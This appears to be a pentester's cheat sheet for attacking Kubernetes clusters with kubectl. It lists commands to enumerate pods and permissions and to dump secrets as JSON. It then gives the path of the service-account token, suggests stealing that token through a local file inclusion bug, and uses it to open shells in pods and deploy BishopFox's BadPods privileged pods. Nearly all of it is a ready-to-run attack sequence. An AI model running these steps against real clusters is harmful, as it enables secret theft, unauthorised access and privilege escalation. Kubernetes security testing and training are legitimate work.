1.1 KiB

Raw Blame History

Kubectl

Get pods, -A for all namespaces

kubectl get pods -A

Check mounted secret

kubectl auth can-i --list
kubectl get secrets
kubectl get nodes
kubectl get deployments
kubectl get services
kubectl get ingress
kubectl get jobs

Intel about a secret, and output

kubectl describe secrets <secret> 
kubectl get secret <secret> -o json
kubectl describe secrets <secret> -o 'json'

Abuse Token

Inside a pod the service token(jwt) can be found under /var/run/secrets/kubernetes.io/serviceaccount/token
By change of an LFI extract the token and

kubectl auth can-i --list --token=$TOKEN
kubectl get pods  --token=$TOKEN
kubectl exec -it <pod name> --token=$TOKEN -- /bin/sh

Create Pods

Use BishopFox's BadPods
If there is no internet connection add imagePullPolicy: IfNotPresent to the YAML file

kubectl apply -f pod.yml --token=$TOKEN

Start Pod

kubectl exec -it everything-allowed-exec-pod --token=$TOKEN -- /bin/bash

Start Pods

kubectl exec -it  <podname> -n <namespace> -- /bin/bash